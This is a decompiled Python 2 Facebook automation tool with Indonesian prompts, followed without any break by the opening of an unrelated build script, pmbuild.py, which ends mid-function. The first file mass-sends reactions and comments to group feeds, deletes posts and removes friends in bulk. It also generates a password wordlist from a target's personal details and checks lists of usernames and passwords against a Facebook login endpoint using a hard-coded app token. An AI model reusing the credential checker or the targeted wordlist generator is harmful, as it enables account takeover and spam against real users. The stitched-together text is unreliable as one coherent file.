global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
pmbuild.py
|
import collections
import sys
import os.path
import json
import fnmatch
import util
import subprocess
import platform
import shutil
import time
import dependencies
import glob
import jsn.jsn as jsn
import cgu.cgu as cgu
from http.server import HTTPServer, CGIHTTPRequestHandler
import webbrowser
import threading
# returns tool to run from cmdline with .exe
def tool_to_platform(tool):
tool = util.sanitize_file_path(tool)
tool = tool.replace("$platform", util.get_platform_name())
if platform.system() == "Windows":
tool += ".exe"
return tool
# ensure running with python3 or py -3
def python_tool_to_platform(tool):
tool = util.sanitize_file_path(tool)
if platform.system() == "Windows":
tool = "py -3 " + tool
else:
tool = "python3 " + tool
return tool
# ches if file is excluded based on know files to ignore
def is_excluded(file):
excluded_files = [".DS_Store"]
for ex in excluded_files:
if file.find(ex) != -1:
return True
return False
# writes a required value input by the user, into config.user.jsn
def update_user_config(k, v, config):
config[k] = v
user = dict()
if os.path.exists("config.user.jsn"):
user = jsn.loads(open("config.user.jsn", "r").read())
user[k] = v
bj = open("config.user.jsn", "w+")
bj.write(json.dumps(user, indent=4))
bj.close()
# locate latest version of the windows sdk
def locate_windows_sdk():
pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"]
sdk = "Windows Kits"
sdk_dir = None
for v in pf_env:
print(v)
d = os.environ[v]
if d:
if sdk in os.listdir(d):
print(sdk)
print(d)
sdk_dir = os.path.join(d, sdk)
break
if sdk_dir:
versions = sorted(os.listdir(sdk_dir), reverse=False)
if len(versions) > 0:
if versions[0] == "10":
# windows 10 has sub versions
source = os.path.join(sdk_dir, versions[0], "Source")
if os.path.exists(source):
sub_versions = sorted(os.listdir(source), reverse=False)
if len(sub_versions) > 0:
return str(sub_versions[0])
else:
# 8.1
return str(versions[0])
return None
# windows only, prompt user to supply their windows sdk version
def configure_windows_sdk(config):
if "sdk_version" in config.keys():
return
# attempt to auto locate
auto_sdk = locate_windows_sdk()
if auto_sdk:
update_user_config("sdk_version", auto_sdk, config)
return
print("Windows SDK version not set.")
print("Please enter the windows sdk you want to use.")
print("You can find available sdk versions in:")
print("Visual Studio > Project Properties > General > Windows SDK Version.")
input_sdk = str(input())
update_user_config("sdk_version", input_sdk, config)
return
# find visual studio installation directory
def locate_vs_root():
pf_env = ["PROGRAMFILES", "PROGRAMFILES(X86)"]
vs = "Microsoft Visual Studio"
vs_dir = ""
for v in pf_env:
d = os.environ[v]
if d:
if vs in os.listdir(d):
vs_dir = os.path.join(d, vs)
break
return vs_dir
# find latest visual studio version
def locate_vs_latest():
vs_dir = locate_vs_root()
if len(vs_dir) == 0:
print("[warning]: could not auto locate visual studio, using vs2017 as default")
return "vs2017"
supported = ["2017", "2019"]
versions = sorted(os.listdir(vs_dir), reverse=False)
for v in versions:
if v in supported:
return "vs" + v
# attempt to locate vc vars all by lookin in prgoram files, and finding visual studio installations
def locate_vc_vars_all():
vs_dir = locate_vs_root()
if len(vs_dir) == 0:
return None
pattern = os.path.join(vs_dir, "**/vcvarsall.bat")
# if we reverse sort then we get the latest vs version
vc_vars = sorted(glob.glob(pattern, recursive=True), reverse=False)
if len(vc_vars) > 0:
return vc_vars[0]
return None
# windows only, configure vcvarsall directory for commandline vc compilation
def configure_vc_vars_all(config):
# already exists
if "vcvarsall_dir" in config.keys():
if os.path.exists(config["vcvarsall_dir"]):
return
# attempt to auto locate
auto_vc_vars = locate_vc_vars_all()
if auto_vc_vars:
auto_vc_vars = os.path.dirname(auto_vc_vars)
update_user_config("vcvarsall_dir", auto_vc_vars, config)
return
# user input
while True:
print("Cannot find 'vcvarsall.bat'")
print("Please enter the full path to the vc2017/vc2019 installation directory containing vcvarsall.bat")
input_dir = str(input())
input_dir = input_dir.strip("\"")
input_dir = os.path.normpath(input_dir)
if os.path.isfile(input_dir):
input_dir = os.path.dirname(input_dir)
if os.path.exists(input_dir):
update_user_config("vcvarsall_dir", input_dir, config)
return
else:
time.sleep(1)
# apple only, ask user for their team id to insert into xcode projects
def configure_teamid(config):
if "teamid" in config.keys():
return
print("Apple Developer Team ID not set.")
print("Please enter your development team ID ie. (7C3Y44TX5K)")
print("You can find team id's or personal team id on the Apple Developer website")
print("Optionally leave this blank and you select a team later in xcode:")
print(" Project > Signing & Capabilities > Team")
input_sdk = str(input())
update_user_config("teamid", input_sdk, config)
return
# configure user settings for each platform
def configure_user(config, args):
config_user = dict()
if os.path.exists("config.user.jsn"):
config_user = jsn.loads(open("config.user.jsn", "r").read())
if util.get_platform_name() == "win32":
if "-msbuild" not in sys.argv:
configure_vc_vars_all(config_user)
configure_windows_sdk(config_user)
if os.path.exists("config.user.jsn"):
config_user = jsn.loads(open("config.user.jsn", "r").read())
util.merge_dicts(config, config_user)
# look for export.json in directory tree, combine and override exports by depth, override further by fnmatch
def export_config_for_directory(filedir, platform):
filepath = util.sanitize_file_path(filedir)
dirtree = filepath.split(os.sep)
export_dict = dict()
subdir = ""
for i in range(0, len(dirtree)):
subdir = os.path.join(subdir, dirtree[i])
export = os.path.join(subdir, "export.jsn")
if os.path.exists(export):
dir_dict = jsn.loads(open(export, "r").read())
util.merge_dicts(export_dict, dir_dict)
if platform in export_dict.keys():
util.merge_dicts(export_dict, export_dict[platform])
return export_dict
# get file specific export config from the directory config checking for fnmatch on the basename
def export_config_for_file(filename):
dir_config = export_config_for_directory(os.path.dirname(filename), "osx")
bn = os.path.basename(filename)
for k in dir_config.keys():
if fnmatch.fnmatch(k, bn):
file_dict = dir_config[k]
util.merge_dicts(dir_config, file_dict)
return dir_config
# get files for task, will iterate dirs, match wildcards or return single files, returned in tuple (src, dst)
def get_task_files(task):
outputs = []
if len(task) != 2:
print("[error] file tasks must be an array of size 2 [src, dst]")
exit(1)
fn = task[0].find("*")
if fn != -1:
# wildcards
fnroot = task[0][:fn - 1]
for root, dirs, files in os.walk(fnroot):
for file in files:
src = util.sanitize_file_path(os.path.join(root, file))
if is_excluded(src):
continue
if fnmatch.fnmatch(src, task[0]):
dst = src.replace(util.sanitize_file_path(fnroot), util.sanitize_file_path(task[1]))
outputs.append((src, dst))
elif os.path.isdir(task[0]):
# dir
for root, dirs, files in os.walk(task[0]):
for file in files:
src = util.sanitize_file_path(os.path.join(root, file))
if is_excluded(src):
continue
dst = src.replace(util.sanitize_file_path(task[0]), util.sanitize_file_path(task[1]))
outputs.append((src, dst))
else:
# single file
if not is_excluded(task[0]):
outputs.append((task[0], task[1]))
return outputs
# get files for a task sorted by directory
def get_task_files_containers(task):
container_ext = ".cont"
